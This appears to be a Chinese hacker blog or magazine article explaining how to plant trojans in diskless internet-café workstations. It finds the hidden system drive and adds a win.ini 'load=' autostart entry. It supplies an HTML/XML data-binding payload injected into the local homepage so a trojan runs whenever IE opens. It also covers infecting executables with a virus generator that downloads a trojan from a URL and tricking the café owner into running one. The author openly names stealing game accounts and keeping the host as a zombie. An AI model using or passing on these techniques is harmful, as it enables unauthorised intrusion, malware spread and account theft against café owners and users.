无盘 破的就是你

源:[url]http://www.goto10000.com/BLOG[/url]

考虑到依冰兄是把木马文件复制到"WZ\All Users\Start Menu\Programs\启动"中，让它随系统启动的，那么我顺着这个思路接着说让木马随系统启动的方法。无盘工作站一般有如下几个盘符：A：用户共用存放文件盘，用户有完全控制权，打开资源管理器就可以看到这个盘符。（如图一）

计算机随用户使用情况不同而不同，用户有完全控制权，打开资源管理器不可直接进入。G：系统启动程序、系统程序、应用程序存放目录，用户权限为只读，打开资源管理器不可看到。
使用dos命令 start g:\ 提示找不到该盘，就是用灵鸠剑客在2004年第2期里介绍的方法也找不到该盘（注：上面提到的盘符随工作站不同而不同。）那么怎样才可以找到这个系统启动程序、系统程序、应用程序的存放盘呢？很简单在桌面上任意找一个文件图标，单击右键→属性→快捷方式→常规。（见图二）

我这里的位置是G:\xyy\Desktop。那怎么才可能进入这个目录呢？你不是说用了N中方法都进不去吗？该你上场了哦，只见20cn迈着矫健的步伐上场了，（如图三）

资源管理器，当然其他的木马也可以啦，
这样所有的盘符我们就一览无疑了。在20cn文件浏览里找到G盘的xyy目录，它就是我们桌面快捷方式的存放目录，这个目录在系统重起时自动加载。在xyy\Start Menu\Programs\启动中找到了快捷方式qq.ink，其实它指向的是杀毒软件qqav。（如图四）

是网吧老板为我们设置的，用来清除qq病毒，每次开机自动远行。在桌面上也可以看到它（如图五）

到这个qq.ink也就是说我们找对目录了，但是把木马放在这里也太招人耳目了，于是我选择在G:\xyy\WZ中的win.ini文件里写入一个文本文件的路径，
[windows]
load=A:\2004.txt
run=
NullPort=None
关机重起，一个可爱的文本文件自己跳了出来，呵呵成功了。接着我又把G:\xyy\WZ\win.ini改为原样继续测试，发现wz.stz目录中win.ini文件，只有在用户重建或者注销后，"load="后面的文件才会在系统重起后自动远行，这对一些喜欢盗传奇号和其他游戏号的朋友带来了福音，因为他们最怕用户重建或者注销了，因为重建后就连qq病毒都报销了，就更不用说他们的盗号木马了。在G盘中还有很多目录中有win.ini、SYSTEM.ini和启动，我没有时间一一去试了，有兴趣的朋友可以自己去试下，说不定有新的发现。

前面我是顺着依冰兄的思路说了一段，下面说的木马自启动方法就不是让它随系统启动了，而是姜太公钓鱼愿者上钩，让用户来帮我们运行木马文件。

第一种方法：借尸还魂

这天我在网吧上网，学习sql注入，忽然整个网吧掉线了。我晕，刚刚才猜到一个表名啊。于是我等了一会，又打开IE，想看看连上线没有，好进入下一步的猜解，但是还是没有连上，而IE的左下角却显示着"G:\xyy\web-\……"后面的字没有看清楚，再看网页中的图片都显示出来了，查看网页原文发现图片都是相对路径，而网页上的那些栏目都是绝对路径，难道说无盘系统设置主页时是先让IE打开本地的网页再转到另外一个网上的主页地址，我灵机一动，马上打开G:\xyy\web-\找到了一个名为index1.htm的文件，（如图六）

在里面加入以下代码：
<span datasrc="#hao#" datafld="exploit" dataformatas="html"></span>
<xml id="hao#">
<nothing>
<exploit>
<![CDATA[<object classid="clsid:11340012004-4414-478473" codebase="g:/ss.exe"></object>]]>
</exploit>
</nothing>
</xml>

请把g:/ss.exe 改为你木马的路径。这段代码的好处是不需要activex支持，因为现在很多网吧都把它禁用了。这样只要有人打开IE，那么我们的木马g:/ss.exe就运行了，那么怎样找到这个网页文件的路径呢？先告诉你一个笨办法，那就是先把网线拔了，人为的制造一次掉线，哈哈！第二个方法当然是去注册表
[HKEY_CURRENT_USER\software\microsoft\internet Explorer\main]下面去找啦。

第二种方法：毒上加毒

使用这种办法，不但可以让木马跑起来，而且只要略施小计还可以提升我们在网吧的权限，为什么这么说呢？跟我来，我首先说一下什么叫做毒上加毒。先把我的宝贝史莱姆病毒生成器打开，史莱姆是一个可以感染Windows下的EXE文件的病毒，与其它病毒的不同是它不会发作，不会对系统造成任何破坏。在主机上网时，它会自动从事先设定的URL下载程序并运行，并且具有智能监测功能，可以保证下载的程序始终在运行。
我看中的不仅是它的智能监测功能，还有当我们对我们的马儿不满意，想换个口味时只要把URL下的木马改掉就可以了，是不是比文件捆绑强多了。
程序的设置也非常简单，（如图七）

在"URL设置"栏处填入你的木马URL。这里需要一个主页空间，什么你没有，那么赶快去[url]http://www.topcities.com[/url]申请一个吧！有150mb大小哦，你想放什么都可以啦。接着在"感染设置"栏目中输入想要被病毒感染的文件路径，我这里是选择的G:\sfMir16\私服添删工具.exe，这样一个病毒加木马毒上加毒的程序就打造完成了。
在无盘工作室上过网的朋友可能会问，这个"私服添删工具.exe"（如图八）

在桌面上没有快捷方式，而G盘又打不开。一般的用户连看也看不到这个文件，又怎么可能去运行它呢？问得好，那么我们反过来想一下，既然一般的用户不可能运行它，那谁才有这个权限呢？当然是网吧老板啦。这个时候我只要跑到老板那里对他说："给我添加一个私服：218.15.21.145……"他就会熟练的打开N个文件目录后运行我们的染毒文件――私服添删工具.exe，正当他等我赞扬他服务态度好的时候，我却在一边发出"星仔"般的奸笑，哈哈……
因为现在网吧主机已经感染了史莱姆病毒，病毒自动从事先设定的URL下载了我们的木马并运行了它。就这样略施小计我们拿到了网吧的最高权限，捕获了一只长时间在线的肉鸡，给它装个网络盒子，给我们当免费主页空间使唤再好不过了。想要让网吧其它计算机感染史莱姆的话也很简单，先连上网吧主机让网吧断开网络，正在玩网络游戏的用户就纷纷退出游戏了，趁这个短暂的时间，马上用相同的手法去感染如："***堂" 一类的的网络游戏，等老板再次把网络连上，只要有人进了***堂，那我们的马儿就悄悄的在后台远行了。